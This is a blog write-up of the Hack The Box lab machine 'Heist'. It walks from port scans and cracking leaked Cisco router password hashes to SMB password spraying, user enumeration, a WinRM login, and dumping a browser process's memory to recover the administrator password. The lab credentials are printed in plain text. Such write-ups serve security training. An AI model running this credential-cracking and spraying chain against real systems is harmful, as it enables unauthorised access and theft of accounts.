<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : MinatoTWIP : 10.10.10.149[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.149
But this script is running soooo slow, so let&amp;rsquo;s make some changes :
nmap -p- --open -n --min-rate 5000 10.10.10.149
PORT STATE SERVICE80/tcp open http135/tcp open msrpc445/tcp open microsoft-ds5985/tcp open wsman49669/tcp open unknownOnce seen that, let&amp;rsquo;s get a deeper scan on those ports :'><title>[5] Heist Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/heist-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[5] Heist Hackthebox'>
<meta property='og:description' content='BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : MinatoTWIP : 10.10.10.149[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.149
But this script is running soooo slow, so let&amp;rsquo;s make some changes :
nmap -p- --open -n --min-rate 5000 10.10.10.149
PORT STATE SERVICE80/tcp open http135/tcp open msrpc445/tcp open microsoft-ds5985/tcp open wsman49669/tcp open unknownOnce seen that, let&amp;rsquo;s get a deeper scan on those ports :'>
<meta property='og:url' content='https://example.com/posts/heist-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-18T22:11:40&#43;01:00'/><meta property='article:modified_time' content='2021-03-18T22:11:40&#43;01:00'/>
<meta name="twitter:title" content="[5] Heist Hackthebox">
<meta name="twitter:description" content="BOX INFO :computer: :Operative System : Windows 🌐Difficulty : Easy :waxing_gibbous_moon:Owner : MinatoTWIP : 10.10.10.149[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
nmap -p- --open -T5 -n 10.10.10.149
But this script is running soooo slow, so let&amp;rsquo;s make some changes :
nmap -p- --open -n --min-rate 5000 10.10.10.149
PORT STATE SERVICE80/tcp open http135/tcp open msrpc445/tcp open microsoft-ds5985/tcp open wsman49669/tcp open unknownOnce seen that, let&amp;rsquo;s get a deeper scan on those ports :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/heist-hackthebox/">[5] Heist Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 18, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <pre><code>BOX INFO :computer: :

Operative System : Windows 🌐
Difficulty : Easy :waxing_gibbous_moon:
Owner : MinatoTW
IP : 10.10.10.149
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>To get a fast scan, we&rsquo;re using this command to discovery ports:</p>
<p><code>nmap -p- --open -T5 -n 10.10.10.149</code></p>
<p>But this script is running soooo slow, so let&rsquo;s make some changes :</p>
<p><code>nmap -p- --open -n --min-rate 5000 10.10.10.149</code></p>
<pre><code>PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown
</code></pre><p>Once seen that, let&rsquo;s get a deeper scan on those ports :</p>
<p><code>nmap -sC -sS -sV -p80,135,445,5985,49669 10.10.10.149</code></p>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="n">PORT</span>      <span class="n">STATE</span> <span class="n">SERVICE</span>       <span class="n">VERSION</span>
<span class="m">80</span><span class="o">/</span><span class="n">tcp</span>    <span class="n">open</span>  <span class="n">http</span>          <span class="n">Microsoft</span> <span class="n">IIS</span> <span class="n">httpd</span> <span class="m">10.0</span>
<span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">cookie</span><span class="o">-</span><span class="n">flags</span><span class="o">:</span> 
<span class="o">|</span>   <span class="o">/:</span> 
<span class="o">|</span>     <span class="n">PHPSESSID</span><span class="o">:</span> 
<span class="o">|</span><span class="n">_</span>      <span class="n">httponly</span> <span class="n">flag</span> <span class="n">not</span> <span class="n">set</span>
<span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">methods</span><span class="o">:</span> 
<span class="o">|</span><span class="n">_</span>  <span class="n">Potentially</span> <span class="n">risky</span> <span class="n">methods</span><span class="o">:</span> <span class="n">TRACE</span>
<span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="o">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">IIS</span><span class="o">/</span><span class="m">10.0</span>
<span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">title</span><span class="o">:</span> <span class="n">Support</span> <span class="n">Login</span> <span class="n">Page</span>
<span class="o">|</span><span class="n">_Requested</span> <span class="n">resource</span> <span class="n">was</span> <span class="n">login.php</span>
<span class="m">135</span><span class="o">/</span><span class="n">tcp</span>   <span class="n">open</span>  <span class="n">msrpc</span>         <span class="n">Microsoft</span> <span class="n">Windows</span> <span class="n">RPC</span>
<span class="m">445</span><span class="o">/</span><span class="n">tcp</span>   <span class="n">open</span>  <span class="n">microsoft</span><span class="o">-</span><span class="n">ds</span><span class="o">?</span>
<span class="m">5985</span><span class="o">/</span><span class="n">tcp</span>  <span class="n">open</span>  <span class="n">http</span>          <span class="n">Microsoft</span> <span class="n">HTTPAPI</span> <span class="n">httpd</span> <span class="m">2.0</span> <span class="p">(</span><span class="n">SSDP</span><span class="o">/</span><span class="n">UPnP</span><span class="p">)</span>
<span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="o">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">HTTPAPI</span><span class="o">/</span><span class="m">2.0</span>
<span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">title</span><span class="o">:</span> <span class="n">Not</span> <span class="n">Found</span>
<span class="m">49669</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span>  <span class="n">msrpc</span>         <span class="n">Microsoft</span> <span class="n">Windows</span> <span class="n">RPC</span>
<span class="n">Service</span> <span class="n">Info</span><span class="o">:</span> <span class="n">OS</span><span class="o">:</span> <span class="n">Windows</span><span class="p">;</span> <span class="n">CPE</span><span class="o">:</span> <span class="n">cpe</span><span class="o">:/</span><span class="n">o</span><span class="o">:</span><span class="n">microsoft</span><span class="o">:</span><span class="n">windows</span>

<span class="n">Host</span> <span class="n">script</span> <span class="n">results</span><span class="o">:</span>
<span class="o">|</span><span class="n">_clock</span><span class="o">-</span><span class="n">skew</span><span class="o">:</span> <span class="m">-1</span><span class="n">s</span>
<span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="n">security</span><span class="o">-</span><span class="n">mode</span><span class="o">:</span> 
<span class="o">|</span>   <span class="m">2.02</span><span class="o">:</span> 
<span class="o">|</span><span class="n">_</span>    <span class="n">Message</span> <span class="n">signing</span> <span class="n">enabled</span> <span class="n">but</span> <span class="n">not</span> <span class="n">required</span>
<span class="o">|</span> <span class="n">smb2</span><span class="o">-</span><span class="n">time</span><span class="o">:</span> 
<span class="o">|</span>   <span class="n">date</span><span class="o">:</span> <span class="m">2021-03-18</span><span class="n">T21</span><span class="o">:</span><span class="m">30</span><span class="o">:</span><span class="m">10</span>
<span class="o">|</span><span class="n">_</span>  <span class="n">start_date</span><span class="o">:</span> <span class="n">N</span><span class="o">/</span><span class="n">A</span>
</code></pre></div><p>Okay we can see a website, samba server and other not really relevant services right now. Let&rsquo;s check samba :</p>
<p>First of all we&rsquo;ll be trying to login with a null session but it doesn&rsquo;t work :(</p>
<p><code>smbclient -L //10.10.10.149/</code></p>
<pre><code>Enter WORKGROUP\Maiky's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
</code></pre><p>So, once seen that, let&rsquo;s check the website :</p>
<p><img src="/static/HACKING/heist-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>There&rsquo;s a login page but we don&rsquo;t have any creds, so let&rsquo;s login as guest :</p>
<p><img src="/static/HACKING/heist-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hazard is saying he has some problems with his cisco router, and there is an attached file :</p>
<pre><code>version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
</code></pre><p>Interesting&hellip; Here we can see 5 users and 3 hashes to crack, and as Hazard said, these are cisco encrypted hashes :</p>
<pre><code># Users
rout3r
admin
secret
security
hazard

# Hashes
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
</code></pre><p>There are two main types of hashes in cisco, type 7 (the most common) and type 5 (this is kinda more difficult to crack, this we&rsquo;ll need to brute force).</p>
<p>Let&rsquo;s go first with type 7&rsquo;s. After a little research I found a github script : <code>https://github.com/theevilbit/ciscot7</code></p>
<p><code>python ciscot7.py -d -p 0242114B0E143F015F5D1E161713</code></p>
<pre><code>Decrypted password: $uperP@ssword
</code></pre><p><code>python ciscot7.py -d -p 02375012182C1A1D751618034F36415408</code></p>
<pre><code>Decrypted password: Q4)sJu\Y8qz*A3?d
</code></pre><p>And about type 5&rsquo;s, I&rsquo;ll use john to crack it:</p>
<p><code>john --wordlist=/usr/share/wordlists/rockyou.txt hash</code>
<code>john hash --show</code></p>
<pre><code>?:stealth1agent

1 password hash cracked, 0 left
</code></pre><p>Nice, let&rsquo;s try to bruteforce with this the samba server, we&rsquo;ll be using crackmapexec :</p>
<p><code>crackmapexec smb 10.10.10.149 -u users.txt -p passwords.txt</code></p>
<pre><code>SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent
</code></pre><p>Oh yeah! So let&rsquo;s try to login into smb with this creds :</p>
<pre><code>hazard:stealth1agent
</code></pre><p>We should keep ennumerating smb users, we&rsquo;ll be using impacket and the script lookupsid.py <code>https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/lookupsid.py</code>:</p>
<p><code>python3 lookupsid.py hazard@10.10.10.149</code></p>
<pre><code>Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
</code></pre><p>So some new users! -&gt; Chase &amp; Jason, Let&rsquo;s try to run crackmapexec again (now we have to remove hazard from the wordlist because the script stops once it finds a valid username&amp;password)</p>
<p><code>crackmapexec smb 10.10.10.149 -u users.txt -p results.txt</code></p>
<pre><code>SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
</code></pre><p>Let&rsquo;s try to log into the machine, in my case, I&rsquo;ll be using evil-winrm to connect to the port 5985 wsman-&gt; <code>https://github.com/Hackplayers/evil-winrm</code> :</p>
<p><code>./evil-winrm.rb -i 10.10.10.149 -u Chase</code></p>
<pre><code>Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents&gt; 
</code></pre><p>And, WE&rsquo;RE IN!</p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>To be honest I&rsquo;m a absolute noob about Windows Privilege Scalation, so I followed this : <code>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---processes-enumeration-and-tasks</code></p>
<p>After a long reserch, enumerating system processes I found this :</p>
<p><code>*Evil-WinRM* PS C:\Users\Chase\Documents&gt; Get-Process</code></p>
<pre><code>Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    484      18     2296       5340               380   0 csrss
    289      13     2252       5096               488   1 csrss
    360      15     3472      14436              4996   1 ctfmon
    250      14     3924      13220              3824   0 dllhost
    166       9     1880       9816       0.02   7032   1 dllhost
    623      35    31256      58204               976   1 dwm
   1492      57    23468      79396               968   1 explorer
    378      28    24796      62044       0.88   2504   1 firefox
    355      25    16348      38920       0.22   4408   1 firefox
   1079      75   181268     534248       8.02   6708   1 firefox
    347      20     9924      34688       0.06   6828   1 firefox
    401      35    40640      99708       1.00   6964   1 firefox

[...]
</code></pre><p>Hmmm, firefox is not a usual process in Windows, maybe it&rsquo;s running as Administrator and we can dump the process and see what&rsquo;s going on inside. We&rsquo;ll use procdump -&gt; <code>https://github.com/Sysinternals/ProcDump-for-Linux</code> :</p>
<p>To upload it we&rsquo;ll just go to the firefox file directory and upload it directly from the evil-winrm :</p>
<p><code>*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla&gt; upload /local/path/to/file/procdump64.exe</code></p>
<p>Let&rsquo;s run it :</p>
<p><code>*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla&gt; ./procdump64.exe -ma 6708</code> # 6708 is the process ID, we got it from &ldquo;Get-Process&rdquo;</p>
<p>Once done this we got this file :</p>
<pre><code>-a----        3/19/2021   4:58 AM      543248937 firefox.exe_210319_045808.dmp
</code></pre><p>We can&rsquo;t read the file, so let&rsquo;s run a &ldquo;strings&rdquo; to it, in my case I downloaded it from here -&gt; <code>https://download.sysinternals.com/files/Strings.zip</code></p>
<p>And we&rsquo;ll upload it at the same way as procdump :</p>
<p><code>*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla&gt; upload /local/path/to/file/strings64.exe</code></p>
<p>And we run it :</p>
<p><code>*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\mozilla&gt; cmd /c &quot;strings64.exe firefox.exe_210319_045808.dmp &gt; dumped_info.txt&quot;</code></p>
<p>I&rsquo;ve tried to read dumped_info.txt but it was toooooo long, so I&rsquo;ll try luck filtering by &ldquo;password&rdquo; :</p>
<p>Looking into the file I found this :</p>
<pre><code>-os-restarted localhost/login.php?login_username=admin@support.htb&amp;login_password=4dD!5}x/re8]FBuZ&amp;login=
</code></pre><p>So, maybe password is &ldquo;4dD!5}x/re8]FBuZ&rdquo; ? Let&rsquo;s try :</p>
<p><code>./evil-winrm.rb -i 10.10.10.149 -u Administrator</code></p>
<pre><code>*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; whoami
supportdesk\administrator
</code></pre><h1 id="thanks-for-reading">THANKS FOR READING!!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
